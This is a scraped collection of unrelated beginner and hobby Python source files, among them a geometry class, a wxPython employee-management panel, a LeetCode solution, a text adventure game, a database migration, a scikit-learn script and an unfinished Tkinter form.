Square(Rectangle):\n \"\"\"\n Square is a Class that defines the properties of a square\n based on the class Rectangle\n\n Attributes:\n size (int): the width of the square\n x (int): x coordinates of the square\n y (int): y coordinates of the square\n \"\"\"\n\n def __init__(self, size, x=0, y=0, id=None):\n \"\"\"Init function to create an instance of the Square\n\n Arguments:\n size (int): width of the square\n x (int, optional): x coordinate, defaults to 0\n y (int, optional): y coordinate, defaults to 0\n id (int, optional): the identity of square,\n defaults to None\n \"\"\"\n super().__init__(size, size, x, y, id)\n\n @property\n def size(self):\n \"\"\"A function that retrieves the width property\n\n Returns: (int) the width of the rectangle\n \"\"\"\n return self.width\n\n @size.setter\n def size(self, value):\n \"\"\"A function that sets the width of the rectangle\n\n Arguments:\n value (int): the value of the width to set to\n\n Raises:\n TypeError: raised when width is not an int\n ValueError: raised when width is 0 or negative\n \"\"\"\n if not isinstance(value, int):\n raise TypeError(\"width must be an integer\")\n if value <= 0:\n raise ValueError(\"width must be > 0\")\n self.width = value\n self.height = value\n\n def __str__(self):\n \"\"\"A function that overrides the __str__ method\n and prints the properties of the square\n \"\"\"\n return (\"[Square] ({}) {:d}/{:d} - {:d}\".\n format(self.id, self.x, self.y, self.size))\n\n def update(self, *args, **kwargs):\n \"\"\"A function that updates properties with *args\n\n Arguments:\n *args (tuple): the list of non-keyworded argumensts\n **kwargs (dict): a dictionary of keyworded arguments\n \"\"\"\n\n if args is not None and len(args) != 0:\n attribs = ['id', 'size', 'x', 'y']\n for i in range(len(args)):\n if attribs[i] == 'size':\n setattr(self, 'width', args[i])\n setattr(self, 'height', args[i])\n else:\n setattr(self, attribs[i], args[i])\n else:\n for key, value in kwargs.items():\n if key == 'size':\n setattr(self, 'width', value)\n setattr(self, 'height', value)\n else:\n setattr(self, key, value)\n\n def to_dictionary(self):\n \"\"\"A function that creates a dictionary representation\n of the Square\n\n Returns:\n dict (dictionary) : the properties of the Square\n \"\"\"\n dict1 = {}\n dictsqr = self.__dict__\n dict1['id'] = dictsqr['id']\n dict1['size'] = dictsqr['_Rectangle__width']\n dict1['x'] = dictsqr['_Rectangle__x']\n dict1['y'] = dictsqr['_Rectangle__y']\n return (dict1)\n","repo_name":"Benard-Kiplangat/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/square.py","file_name":"square.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"13700604991","text":"# -*- coding: utf-8 -*-\n\n## This file is part of Gertrude.\n##\n## Gertrude is free software; you can redistribute it and/or modify\n## it under the terms of the GNU General Public License as published by\n## the Free Software Foundation; either version 3 of the License, or\n## (at your option) any later version.\n##\n## Gertrude is distributed in the hope that it will be useful,\n## but WITHOUT ANY WARRANTY; without even the implied warranty of\n## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n## GNU General Public License for more details.\n##\n## You should have received a copy of the GNU General Public License\n## along with Gertrude; if not, see .\n\nimport os, datetime, time, xml.dom.minidom, cStringIO\nimport wx, wx.lib.scrolledpanel, wx.html\nfrom constants import *\nfrom sqlobjects import *\nfrom controls import *\nfrom planning import *\nfrom cotisation import *\nfrom ooffice import *\n \nwildcard = \"PNG (*.png)|*.png|\" \\\n \"BMP (*.pmp)|*.bmp|\" \\\n \"All files (*.*)|*.*\"\n\nclass SalariesTab(AutoTab):\n def __init__(self, parent):\n AutoTab.__init__(self, parent)\n self.salarie = None\n\n def SetSalarie(self, salarie):\n self.salarie = salarie\n for ctrl in self.ctrls:\n ctrl.SetInstance(salarie)\n\nclass IdentiteSalariePanel(SalariesTab):\n def __init__(self, parent):\n SalariesTab.__init__(self, parent)\n self.salarie = None\n self.delbmp = wx.Bitmap(GetBitmapFile(\"remove.png\"), wx.BITMAP_TYPE_PNG)\n self.sizer = wx.BoxSizer(wx.VERTICAL)\n sizer2 = wx.FlexGridSizer(0, 2, 5, 10)\n self.sizer2 = sizer2\n sizer2.AddGrowableCol(1, 1)\n prenom_ctrl = AutoTextCtrl(self, None, 'prenom')\n self.Bind(wx.EVT_TEXT, self.EvtChangementPrenomNom, prenom_ctrl)\n nom_ctrl = AutoTextCtrl(self, None, 'nom')\n self.Bind(wx.EVT_TEXT, self.EvtChangementPrenomNom, nom_ctrl)\n sizer2.AddMany([(wx.StaticText(self, -1, u'Prénom :'), 0, wx.ALIGN_CENTER_VERTICAL), (prenom_ctrl, 0, wx.EXPAND)])\n sizer2.AddMany([(wx.StaticText(self, -1, 'Nom :'), 0, wx.ALIGN_CENTER_VERTICAL), (nom_ctrl, 0, wx.EXPAND)])\n for label, field in (u\"Téléphone domicile\", \"telephone_domicile\"), (u\"Téléphone portable\", \"telephone_portable\"):\n sizer3 = wx.BoxSizer(wx.HORIZONTAL)\n sizer3.AddMany([(AutoPhoneCtrl(self, None, field), 0), (AutoTextCtrl(self, None, field+'_notes'), 1, wx.LEFT|wx.EXPAND, 5)])\n sizer2.AddMany([(wx.StaticText(self, -1, label+' :'), 0, wx.ALIGN_CENTER_VERTICAL), (sizer3, 0, wx.EXPAND)])\n sizer2.AddMany([(wx.StaticText(self, -1, 'E-mail :'), 0, wx.ALIGN_CENTER_VERTICAL), (AutoTextCtrl(self, None, 'email'), 0, wx.EXPAND)])\n sizer2.AddMany([(wx.StaticText(self, -1, u\"Diplômes :\"), 0, wx.ALIGN_CENTER_VERTICAL), (AutoComboBox(self, None, 'diplomes', choices=[\"CAP petite enfance\", u\"Auxiliaire puéricultrice\", \"EJE\", u\"Puéricultrice\", \"Sans objet\"]), 0, wx.EXPAND)])\n self.sizer.Add(sizer2, 0, wx.EXPAND|wx.ALL, 5)\n self.SetSizer(self.sizer)\n self.sizer.FitInside(self)\n \n def EvtChangementPrenomNom(self, event):\n event.GetEventObject().onText(event)\n self.parent.EvtChangementPrenomNom(event)\n\n def EvtChangementDateNaissance(self, event):\n date_naissance = self.date_naissance_ctrl.GetValue()\n self.age_ctrl.SetValue(GetAgeString(date_naissance))\n\n def EvtChangementCodePostal(self, event):\n code_postal = self.code_postal_ctrl.GetValue()\n if code_postal and not self.ville_ctrl.GetValue():\n for salarie in creche.salaries:\n if salarie.code_postal == code_postal and salarie.ville:\n self.ville_ctrl.SetValue(salarie.ville)\n break\n \n def UpdateContents(self):\n AutoTab.UpdateContents(self)\n self.sizer.FitInside(self)\n \n def SetSalarie(self, salarie):\n self.salarie = salarie\n self.UpdateContents()\n SalariesTab.SetSalarie(self, salarie)\n\nclass CongesPanel(SalariesTab):\n def __init__(self, parent):\n global delbmp\n delbmp = wx.Bitmap(GetBitmapFile(\"remove.png\"), wx.BITMAP_TYPE_PNG)\n self.last_creche_observer = -1\n \n SalariesTab.__init__(self, parent)\n self.sizer = wx.BoxSizer(wx.VERTICAL)\n \n self.conges_creche_sizer = wx.BoxSizer(wx.VERTICAL)\n self.affiche_conges_creche()\n self.sizer.Add(self.conges_creche_sizer, 0, wx.ALL, 5)\n \n self.conges_salarie_sizer = wx.BoxSizer(wx.VERTICAL)\n self.sizer.Add(self.conges_salarie_sizer, 0, wx.ALL, 5)\n \n self.nouveau_conge_button = wx.Button(self, -1, u'Nouvelle période de congés')\n self.sizer.Add(self.nouveau_conge_button, 0, wx.EXPAND+wx.TOP, 5)\n self.Bind(wx.EVT_BUTTON, self.evt_conge_add, self.nouveau_conge_button)\n\n# sizer2 = wx.BoxSizer(wx.HORIZONTAL)\n# sizer2.AddMany([(wx.StaticText(self, -1, u'Nombre de semaines de congés déduites :'), 0, wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, 10), (AutoNumericCtrl(self, creche, 'semaines_conges', min=0, precision=0), 0, wx.EXPAND)])\n# self.sizer.Add(sizer2, 0, wx.EXPAND+wx.TOP, 5)\n\n self.SetSizer(self.sizer)\n\n def UpdateContents(self):\n if 'conges' in observers and observers['conges'] > self.last_creche_observer:\n self.affiche_conges_creche()\n if self.salarie:\n for i in range(len(self.conges_salarie_sizer.GetChildren()), len(self.salarie.conges)):\n self.AddLine(i)\n for i in range(len(self.salarie.conges), len(self.conges_salarie_sizer.GetChildren())):\n self.RemoveLine()\n else:\n for i in range(len(self.conges_salarie_sizer.GetChildren())):\n self.RemoveLine()\n self.sizer.Layout()\n AutoTab.UpdateContents(self)\n \n def SetSalarie(self, salarie):\n self.salarie = salarie\n self.UpdateContents()\n SalariesTab.SetSalarie(self, salarie)\n self.nouveau_conge_button.Enable(self.salarie is not None and not readonly)\n\n def affiche_conges_creche(self):\n self.conges_creche_sizer.DeleteWindows()\n labels_conges = [j[0] for j in jours_fermeture]\n for text in labels_conges:\n checkbox = wx.CheckBox(self, -1, text)\n checkbox.Disable()\n if text in creche.feries:\n checkbox.SetValue(True)\n self.conges_creche_sizer.Add(checkbox, 0, wx.EXPAND)\n for conge in creche.conges:\n sizer = wx.BoxSizer(wx.HORIZONTAL)\n sizer.AddMany([(wx.StaticText(self, -1, 'Debut :'), 0, wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, 10), AutoDateCtrl(self, conge, 'debut', mois=True, fixed_instance=True)])\n sizer.AddMany([(wx.StaticText(self, -1, 'Fin :'), 0, wx.LEFT|wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, 10), AutoDateCtrl(self, conge, 'fin', mois=True, fixed_instance=True)])\n sizer.AddMany([(wx.StaticText(self, -1, u'Libellé :'), 0, wx.LEFT|wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, 10), AutoTextCtrl(self, conge, 'label', fixed_instance=True)])\n for child in sizer.GetChildren():\n child.GetWindow().Disable()\n self.conges_creche_sizer.Add(sizer)\n self.last_creche_observer = time.time()\n\n def AddLine(self, index):\n sizer = wx.BoxSizer(wx.HORIZONTAL)\n sizer.AddMany([(wx.StaticText(self, -1, 'Debut :'), 0, wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, 10), AutoDateCtrl(self, self.salarie, 'conges[%d].debut' % index, mois=True)])\n sizer.AddMany([(wx.StaticText(self, -1, 'Fin :'), 0, wx.LEFT|wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, 10), AutoDateCtrl(self, self.salarie, 'conges[%d].fin' % index, mois=True)])\n sizer.AddMany([(wx.StaticText(self, -1, u'Libellé :'), 0, wx.LEFT|wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, 10), AutoTextCtrl(self, self.salarie, 'conges[%d].label' % index)])\n delbutton = wx.BitmapButton(self, -1, delbmp)\n delbutton.index = index\n sizer.Add(delbutton, 0, wx.LEFT|wx.ALIGN_CENTER_VERTICAL, 10)\n self.Bind(wx.EVT_BUTTON, self.evt_conge_del, delbutton)\n self.conges_salarie_sizer.Add(sizer)\n \n def RemoveLine(self):\n index = len(self.conges_salarie_sizer.GetChildren()) - 1\n sizer = self.conges_salarie_sizer.GetItem(index)\n sizer.DeleteWindows()\n self.conges_salarie_sizer.Detach(index)\n\n def evt_conge_add(self, event):\n history.Append(Delete(self.salarie.conges, -1))\n self.salarie.AddConge(CongeSalarie(self.salarie))\n self.AddLine(len(self.salarie.conges) - 1)\n self.sizer.Layout()\n\n def evt_conge_del(self, event):\n index = event.GetEventObject().index\n history.Append(Insert(self.salarie.conges, index, self.salarie.conges[index]))\n self.RemoveLine()\n conge = self.salarie.conges[index]\n del self.salarie.conges[index]\n conge.delete()\n self.sizer.Layout()\n self.UpdateContents()\n\nclass PlanningReferenceSalariePanel(PlanningWidget):\n def __init__(self, parent, activity_choice):\n PlanningWidget.__init__(self, parent, activity_choice, options=NO_ICONS|PRESENCES_ONLY)\n \n def UpdateContents(self):\n lines = []\n if self.contrat:\n for day in range(self.contrat.duree_reference):\n if JourSemaineAffichable(day):\n line = self.contrat.reference[day]\n line.insert = None\n line.label = days[day % 7]\n line.reference = None\n line.summary = True\n lines.append(line)\n self.SetLines(lines)\n\n def SetContrat(self, contrat):\n self.contrat = contrat\n self.UpdateContents()\n \nclass ContratsSalariePanel(SalariesTab, PeriodeMixin):\n def __init__(self, parent):\n SalariesTab.__init__(self, parent)\n PeriodeMixin.__init__(self, 'contrats')\n sizer = wx.BoxSizer(wx.VERTICAL)\n ligne_sizer = wx.BoxSizer(wx.HORIZONTAL)\n ligne_sizer.Add(PeriodeChoice(self, self.nouveauContrat))\n sizer.Add(ligne_sizer, 0, wx.TOP, 5)\n sizer1 = wx.FlexGridSizer(0, 2, 5, 10)\n sizer1.AddGrowableCol(1, 1)\n \n self.sites_items = wx.StaticText(self, -1, u\"Site :\"), AutoChoiceCtrl(self, None, 'site'), wx.StaticText(self, -1, u\"Sites de préinscription :\"), wx.CheckListBox(self, -1)\n self.UpdateSiteItems()\n sizer1.AddMany([(self.sites_items[0], 0, wx.ALIGN_CENTER_VERTICAL), (self.sites_items[1], 0, wx.EXPAND)])\n sizer1.AddMany([(self.sites_items[2], 0, wx.ALIGN_CENTER_VERTICAL), (self.sites_items[3], 0, wx.EXPAND)])\n \n sizer1.AddMany([(wx.StaticText(self, -1, u\"Fonction :\"), 0, wx.ALIGN_CENTER_VERTICAL), (AutoTextCtrl(self, None, 'fonction'), 0, wx.EXPAND)])\n \n self.duree_reference_choice = wx.Choice(self)\n for item, data in [(\"1 semaine\", 7)] + [(\"%d semaines\" % (i+2), 7*(i+2)) for i in range(MAX_SEMAINES_REFERENCE-1)]:\n self.duree_reference_choice.Append(item, data)\n self.Bind(wx.EVT_CHOICE, self.onDureeReferenceChoice, self.duree_reference_choice)\n sizer1.AddMany([(wx.StaticText(self, -1, u\"Durée de la période de référence :\"), 0, wx.ALIGN_CENTER_VERTICAL), (self.duree_reference_choice, 0, wx.EXPAND)])\n sizer.Add(sizer1, 0, wx.ALL|wx.EXPAND, 5)\n \n sizer2 = wx.BoxSizer(wx.HORIZONTAL)\n self.button_copy = wx.Button(self, -1, u\"Recopier lundi sur toute la période\")\n sizer2.Add(self.button_copy)\n self.Bind(wx.EVT_BUTTON, self.onMondayCopy, self.button_copy)\n \n self.activity_choice = ActivityComboBox(self) \n sizer2.Add(self.activity_choice, 0, wx.ALIGN_RIGHT)\n sizer.Add(sizer2, 0, wx.EXPAND)\n \n self.planning_panel = PlanningReferenceSalariePanel(self, self.activity_choice)\n sizer.Add(self.planning_panel, 1, wx.EXPAND)\n self.SetSizer(sizer)\n self.UpdateContents()\n \n def nouveauContrat(self, param): # TODO les autres pareil ...\n contrat = Contrat(self.salarie)\n return contrat\n\n def SetSalarie(self, salarie):\n self.salarie = salarie\n self.SetInstance(salarie)\n self.UpdateContents()\n \n def onDureeReferenceChoice(self, event):\n history.Append(None)\n duration = self.duree_reference_choice.GetClientData(self.duree_reference_choice.GetSelection())\n self.salarie.contrats[self.periode].SetReferenceDuration(duration)\n self.UpdateContents()\n \n def onMode_5_5(self, event):\n history.Append(None)\n contrat = self.salarie.contrats[self.periode]\n contrat.mode = MODE_5_5\n for i, day in enumerate(contrat.reference):\n if JourSemaineAffichable(i):\n day.SetState(0)\n self.UpdateContents()\n \n def onMondayCopy(self, event):\n history.Append(None)\n contrat = self.salarie.contrats[self.periode]\n for i, day in enumerate(contrat.reference):\n if i > 0 and JourSemaineAffichable(i):\n day.Copy(contrat.reference[0], False)\n day.Save()\n self.UpdateContents()\n \n def UpdateSiteItems(self):\n if len(creche.sites) > 1:\n items = [(site.nom, site) for site in creche.sites]\n self.sites_items[1].SetItems(items)\n for nom, site in items:\n self.sites_items[3].Append(nom)\n else:\n for item in self.sites_items:\n item.Show(False)\n self.last_site_observer = time.time()\n\n def UpdateContents(self):\n if 'sites' in observers and observers['sites'] > self.last_site_observer:\n self.UpdateSiteItems()\n\n SalariesTab.UpdateContents(self)\n\n self.InternalUpdate()\n \n self.activity_choice.Clear()\n selected = 0\n if creche.HasActivitesAvecHoraires():\n self.activity_choice.Show(True)\n for i, activity in enumerate(creche.activites.values()):\n self.activity_choice.Append(activity.label, activity)\n try:\n if self.activity_choice.activity.value == activity.value:\n selected = i\n except:\n pass\n else:\n self.activity_choice.Show(False)\n self.activity_choice.Append(creche.activites[0].label, creche.activites[0])\n self.activity_choice.SetSelection(selected)\n \n self.Layout()\n\n def SetPeriode(self, periode):\n PeriodeMixin.SetPeriode(self, periode)\n self.InternalUpdate()\n \n def InternalUpdate(self):\n if self.salarie and self.periode is not None and self.periode != -1 and self.periode < len(self.salarie.contrats):\n contrat = self.salarie.contrats[self.periode]\n for obj in [self.duree_reference_choice, self.button_copy]:\n obj.Enable(not readonly)\n if len(creche.sites) > 1:\n for item in self.sites_items[0:2]:\n item.Show(True)\n for item in self.sites_items[2:4]:\n item.Show(False)\n \n self.duree_reference_choice.SetSelection(contrat.duree_reference / 7 - 1)\n self.planning_panel.SetContrat(contrat)\n else:\n self.planning_panel.SetContrat(None)\n for obj in [self.duree_reference_choice, self.button_copy]:\n obj.Disable()\n\n \nclass SalariesNotebook(wx.Notebook):\n def __init__(self, parent, *args, **kwargs):\n wx.Notebook.__init__(self, parent, style=wx.LB_DEFAULT, *args, **kwargs) \n self.parent = parent\n self.salarie = None\n\n self.AddPage(IdentiteSalariePanel(self), u'Identité')\n self.AddPage(CongesPanel(self), u\"Congés\")\n self.AddPage(ContratsSalariePanel(self), u\"Plannings de référence\")\n\n self.Bind(wx.EVT_NOTEBOOK_PAGE_CHANGED, self.onPageChanged) \n \n def EvtChangementPrenomNom(self, event):\n self.parent.ChangePrenomNom(self.salarie)\n\n def onPageChanged(self, event):\n self.GetPage(event.GetSelection()).UpdateContents()\n event.Skip()\n\n def SetSalarie(self, salarie):\n self.salarie = salarie\n for i in range(self.GetPageCount()):\n page = self.GetPage(i)\n page.SetSalarie(salarie)\n \n def UpdateContents(self):\n self.GetCurrentPage().UpdateContents()\n \nclass SalariesPanel(GPanel):\n name = u\"Salariés\"\n bitmap = GetBitmapFile(\"salaries.png\")\n profil = PROFIL_ALL\n def __init__(self, parent):\n GPanel.__init__(self, parent, u\"Salariés\")\n\n # Le control pour la selection du bebe\n sizer = wx.BoxSizer(wx.HORIZONTAL)\n self.choice = wx.Choice(self)\n self.Bind(wx.EVT_CHOICE, self.EvtSalarieChoice, self.choice)\n plusbmp = wx.Bitmap(GetBitmapFile(\"plus.png\"), wx.BITMAP_TYPE_PNG)\n delbmp = wx.Bitmap(GetBitmapFile(\"remove.png\"), wx.BITMAP_TYPE_PNG)\n self.addbutton = wx.BitmapButton(self, -1, plusbmp)\n self.delbutton = wx.BitmapButton(self, -1, delbmp)\n self.addbutton.SetToolTipString(u\"Ajouter un salarié\")\n self.delbutton.SetToolTipString(u\"Retirer ce salarié\")\n self.Bind(wx.EVT_BUTTON, self.EvtSalarieAddButton, self.addbutton)\n self.Bind(wx.EVT_BUTTON, self.EvtSalarieDelButton, self.delbutton)\n sizer.AddMany([(self.choice, 1, wx.EXPAND|wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, 5), (self.addbutton, 0, wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, 5), (self.delbutton, 0, wx.ALIGN_CENTER_VERTICAL)])\n self.sizer.Add(sizer, 0, wx.EXPAND|wx.LEFT, MACOS_MARGIN)\n # le notebook pour la fiche d'contrat\n self.notebook = SalariesNotebook(self)\n self.sizer.Add(self.notebook, 1, wx.EXPAND|wx.TOP, 5)\n self.InitSalaries()\n\n def UpdateContents(self):\n self.notebook.UpdateContents()\n\n def InitSalaries(self, selected=None):\n self.choice.Clear()\n\n salaries = { }\n autres = { }\n for salarie in creche.salaries:\n if salarie.GetContrat(datetime.date.today()) != None:\n salaries[GetPrenomNom(salarie)] = salarie\n else:\n autres[GetPrenomNom(salarie)] = salarie\n \n keys = salaries.keys()\n keys.sort()\n for key in keys:\n self.choice.Append(key, salaries[key])\n \n if len(salaries) > 0 and len(autres) > 0:\n self.choice.Append(150 * '-', None)\n \n keys = autres.keys()\n keys.sort()\n for key in keys:\n self.choice.Append(key, autres[key])\n\n if len(creche.salaries) > 0 and selected != None and selected in creche.salaries:\n self.SelectSalarie(selected)\n elif len(creche.salaries) > 0:\n self.SelectSalarie(self.choice.GetClientData(0))\n else:\n self.SelectSalarie(None)\n\n def EvtSalarieChoice(self, evt):\n ctrl = evt.GetEventObject()\n selected = ctrl.GetSelection()\n salarie = ctrl.GetClientData(selected)\n if salarie:\n self.delbutton.Enable()\n self.notebook.SetSalarie(salarie)\n else:\n ctrl.SetSelection(0)\n self.EvtSalarieChoice(evt)\n\n def SelectSalarie(self, salarie):\n if salarie:\n for i in range(self.choice.GetCount()):\n if self.choice.GetClientData(i) == salarie:\n self.choice.SetSelection(i)\n break\n else:\n self.choice.SetSelection(-1)\n self.notebook.SetSalarie(salarie)\n\n def EvtSalarieAddButton(self, evt):\n history.Append(Delete(creche.salaries, -1))\n salarie = Salarie()\n self.choice.Insert(u'Nouveau salarié', 0, salarie)\n self.choice.SetSelection(0)\n creche.salaries.append(salarie)\n self.notebook.SetSalarie(salarie)\n self.notebook.SetSelection(0) # Selectionne la page identite\n\n def EvtSalarieDelButton(self, evt):\n selected = self.choice.GetSelection()\n salarie = self.choice.GetClientData(selected)\n if salarie:\n dlg = wx.MessageDialog(self,\n u'Les données de ce salarié vont être supprimées, êtes-vous sûr de vouloir continuer ?',\n 'Confirmation',\n wx.YES_NO | wx.NO_DEFAULT | wx.ICON_EXCLAMATION )\n if dlg.ShowModal() == wx.ID_YES:\n index = creche.salaries.index(salarie)\n history.Append(Insert(creche.salaries, index, salarie))\n salarie.delete()\n del creche.salaries[index]\n self.choice.Delete(selected)\n self.choice.SetSelection(-1)\n self.notebook.SetSalarie(None)\n self.delbutton.Disable()\n dlg.Destroy()\n \n def ChangePrenomNom(self, salarie):\n if creche and salarie:\n id = GetPrenomNom(salarie)\n if id.isspace():\n id = u'Nouveau salarié'\n selection = self.choice.GetSelection()\n self.choice.SetString(selection, id)\n self.choice.SetSelection(selection)\n ","repo_name":"mistraloz/gertrude","sub_path":"panel_salaries.py","file_name":"panel_salaries.py","file_ext":"py","file_size_in_byte":21573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"71"} +{"seq_id":"31623149538","text":"# @Time : 2022-08-11 21:43\n# @Author : Phalange\n# @File : 1281. 整数的各位积和之差.py\n# @Software: PyCharm\n# C'est la vie,enjoy it! :D\n\n\n\n\nclass Solution:\n def subtractProductAndSum(self, n: int) -> int:\n nums = [int(each) for each in str(n)]\n ans1 = sum(nums)\n ans2 = 1\n for each in nums:\n ans2 *=each\n return ans2 - ans1\n\nprint(Solution().subtractProductAndSum(\"123\"))","repo_name":"enternityFan/LeetCodePythonVersion","sub_path":"数学/1281. 整数的各位积和之差.py","file_name":"1281. 整数的各位积和之差.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"16642857136","text":"import time\n\ndef introduction():\n print(\"Welcome to the Text Adventure Game!\")\n time.sleep(1)\n print(\"You are standing in front of a mysterious cave.\")\n time.sleep(1)\n print(\"Your mission is to explore the cave and find the hidden treasure.\")\n time.sleep(1)\n print(\"Be cautious, as danger may lurk in the darkness...\")\n time.sleep(1)\n\ndef cave():\n print(\"\\nYou enter the cave.\")\n time.sleep(1)\n print(\"It's dark and damp, and you can hear strange noises echoing.\")\n time.sleep(1)\n\n while True:\n choice = input(\"Do you want to go 'left' or 'right'? \").lower()\n if choice == \"left\":\n treasure_chamber()\n break\n elif choice == \"right\":\n print(\"You stumble upon a group of bats. They startle you and you run back.\")\n else:\n print(\"Invalid choice. Please choose 'left' or 'right'.\")\n\ndef treasure_chamber():\n print(\"\\nYou find yourself in a mysterious treasure chamber.\")\n time.sleep(1)\n print(\"There are three chests in front of you.\")\n time.sleep(1)\n\n while True:\n choice = input(\"Which chest do you want to open? '1', '2', or '3'? \")\n if choice == \"1\":\n print(\"Oh no! A trap! A giant boulder rolls towards you.\")\n time.sleep(1)\n print(\"You couldn't escape in time. Game over!\")\n break\n elif choice == \"2\":\n print(\"Congratulations! You found the treasure! You win!\")\n break\n elif choice == \"3\":\n print(\"A swarm of angry bees fly out and chase you away.\")\n else:\n print(\"Invalid choice. Please choose '1', '2', or '3'.\")\n\nif __name__ == \"__main__\":\n introduction()\n cave()\n","repo_name":"phototix/GH-hacks","sub_path":"python/test4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"20151884035","text":"\"\"\"added model for hall availability\n\nRevision ID: b7494178152b\nRevises: 313755ee9335\nCreate Date: 2023-04-10 13:46:49.920232\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = \"b7494178152b\"\ndown_revision = \"313755ee9335\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n \"hall_availability\",\n sa.Column(\"id\", sa.Integer(), nullable=False),\n sa.Column(\"hall_id\", sa.Integer(), nullable=False),\n sa.Column(\"start_time\", sa.DateTime(), nullable=False),\n sa.Column(\"end_time\", sa.DateTime(), nullable=False),\n sa.ForeignKeyConstraint(\n [\"hall_id\"],\n [\"hall.id\"],\n ),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n with op.batch_alter_table(\"movie\", schema=None) as batch_op:\n batch_op.add_column(sa.Column(\"start_time\", sa.DateTime(), nullable=False))\n batch_op.add_column(sa.Column(\"end_time\", sa.DateTime(), nullable=False))\n batch_op.drop_column(\"screen_time\")\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table(\"movie\", schema=None) as batch_op:\n batch_op.add_column(\n sa.Column(\n \"screen_time\",\n postgresql.TIMESTAMP(),\n autoincrement=False,\n nullable=False,\n )\n )\n batch_op.drop_column(\"end_time\")\n batch_op.drop_column(\"start_time\")\n\n op.drop_table(\"hall_availability\")\n # ### end Alembic commands ###\n","repo_name":"IvoGeorgievx/MovieProject","sub_path":"migrations/versions/b7494178152b_added_model_for_hall_availability.py","file_name":"b7494178152b_added_model_for_hall_availability.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"71423368551","text":"# imports\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn import tree, metrics\r\nfrom sklearn.metrics import accuracy_score\r\n\r\n# ----------- PART B -----------\r\n# q8\r\n# |T|\r\ntrain_data = pd.read_csv(\"train.csv\")\r\nsum_T = train_data[['Outcome']].eq(1).sum()\r\ntrain_data_filtered_T = train_data[train_data['Outcome'] == 1]\r\ntrain_data_filtered_F = train_data[train_data['Outcome'] == 0]\r\ntrain_data_filtered_F_T = train_data_filtered_F.head(sum_T[0])\r\ntrain_data_balanced = pd.concat([train_data_filtered_T, train_data_filtered_F_T]).sort_index()\r\n#print(train_data)\r\n\r\n# Read data from file 'train.csv' and check it on 'test.csv'\r\nX_train = train_data_balanced[train_data_balanced.columns.difference(['Outcome'])]\r\n#print(X_train)\r\nY_train = train_data_balanced[['Outcome']]\r\n#print(Y_train)\r\n\r\ntest_data = pd.read_csv(\"test.csv\")\r\nX_test = test_data[test_data.columns.difference(['Outcome'])]\r\nY_test = test_data[['Outcome']]\r\n\r\nBALANCED = tree.DecisionTreeClassifier(criterion=\"entropy\")\r\nBALANCED = BALANCED.fit(X_train, Y_train)\r\nBALANCED_test = BALANCED.predict(X_test)\r\nprint(\"BALANCED:\")\r\nprint(metrics.confusion_matrix(Y_test, BALANCED_test))\r\n#accuracy_score_BALANCED = accuracy_score(Y_test, BALANCED_test)\r\n#print(accuracy_score_BALANCED)\r\n\r\n\r\n\r\n","repo_name":"AmitTsvi/AI_HW3.1","sub_path":"BALANCED.py","file_name":"BALANCED.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"26733560929","text":"\n\ndef square(a, b, c):\n import math\n D= b**2 - 4 * a * c\n if D < 0:\n x1 = x2 = None\n elif D == 0:\n x1 = x2 = -b / (2 * a)\n else:\n x1 = -(b + math.sqrt(d)) / (2 * a)\n x2 = -(b - math.sqrt(d)) / (2 * a)\n print(\"x1=\", x1, \"x2=\", x2)\n\n\na = input(\"a:\")\nb = input(\"b:\")\nb = input(\"c:\")\nsquare(a, b, c)\ninput()\n","repo_name":"antongulyakov/.py","sub_path":"square.py","file_name":"square.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"7916373305","text":"from tkinter import *\nfrom PIL import Image,ImageTk\nimport os\nimport sqlite3\nfrom tkinter import messagebox\n\nfrom tkinter import ttk\n\n\n\n\nroot=Tk()\nroot.geometry(\"1366x768+60+10\")\nroot.title(\"Contact\")\nroot.resizable(0, 0)\n# root.iconbitmap('./images/3.ico')\n\n\n\n# # # creating database\n# conn = sqlite3.connect(\"info.db\")\n# c = conn.cursor()\n# '''\n# c.execute(\"\"\"CREATE TABLE information(\n# First_Name text,\n# Age integer,\n# Address text,\n# Gender integer,\n# Email text,\n# Password text\n# )\"\"\")\n# '''\n\n# function\n# ------------------------------------------\ndef save():\n global main\n\n conn = sqlite3.connect('info.db')\n c = conn.cursor()\n record_id=employeeID.get()\n c.execute(\"\"\"UPDATE information SET\n 'Full_name': fullname,\n 'Age': age,\n 'Address': address,\n 'Gender': gender,\n 'Email': email,\n 'Password': password\n WHERE oid =:oid\"\"\",\n {\n 'full_name': fullname.get(),\n 'age': age.get(),\n 'address': address.get(),\n 'gender': var.get(),\n 'email': email.get(),\n 'password': password.get()\n })\n 